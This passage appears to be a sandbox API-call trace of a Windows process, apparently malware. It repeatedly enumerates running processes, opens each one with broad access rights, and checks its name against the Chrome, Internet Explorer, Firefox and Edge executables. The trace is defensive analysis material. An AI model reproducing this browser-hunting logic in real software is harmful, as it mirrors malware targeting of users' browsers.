	[0239.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.051] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.052] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0239.052] CloseHandle (hObject=0x4fd0) returned 1
	[0239.052] Sleep (dwMilliseconds=0x64) 
	[0239.284] GetCurrentProcessId () returned 0x110
	[0239.284] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0239.286] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0239.287] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0239.288] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0239.288] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7fe8
	[0239.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.289] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0239.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.291] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.291] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0239.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.291] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.291] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0239.292] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7fec
	[0239.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.292] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0239.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.293] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.293] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0239.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.293] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.293] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0239.294] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7ff0
	[0239.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.294] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0239.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.295] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.295] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0239.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.295] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.295] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0239.296] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7ff4
	[0239.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.296] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0239.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.297] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.297] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0239.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.297] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.297] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0239.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7ff8
	[0239.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.298] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0239.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.299] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.299] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0239.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.299] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.300] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0239.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7ffc
	[0239.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.300] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0239.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.301] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.301] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0239.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.301] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0239.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x8004
	[0239.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.303] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0239.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.303] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.304] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0239.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.304] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.347] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0239.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x8008
	[0239.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.349] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0239.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.349] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.349] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0239.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.350] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.350] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x800c
	[0239.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.351] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.352] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.353] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.353] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.354] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8010
	[0239.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.355] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.355] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.356] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.356] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.356] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.357] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8014
	[0239.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.358] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.358] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.359] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.359] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.359] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.360] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x8018
	[0239.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.361] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.361] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.361] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.362] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.362] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x801c
	[0239.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.363] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.364] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.364] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.365] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.365] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.366] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8020
	[0239.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.366] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.367] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.372] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.372] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.373] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.374] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8024
	[0239.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.374] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.374] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.375] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.375] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.375] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0239.377] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x8028
	[0239.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.377] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0239.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.377] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.378] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0239.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.378] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.378] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.380] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x802c
	[0239.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.380] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.380] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.381] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.381] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.382] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0239.383] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8030
	[0239.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.384] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.384] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.385] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.385] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.385] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0239.386] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8034
	[0239.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.387] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0239.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.387] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.388] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0239.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.388] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.388] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0239.390] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x8038
	[0239.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.390] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0239.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.390] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.391] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0239.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.391] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.392] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0239.393] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x803c
	[0239.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.393] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0239.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.394] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.394] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0239.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.395] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.395] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0239.396] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8040
	[0239.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.396] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0239.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.397] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.397] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0239.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.398] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.409] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0239.410] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8044
	[0239.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.410] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0239.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.410] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0239.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.411] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0239.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.411] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0239.411] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0239.412] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x8048
	[0239.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.413] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0239.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0239.413] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
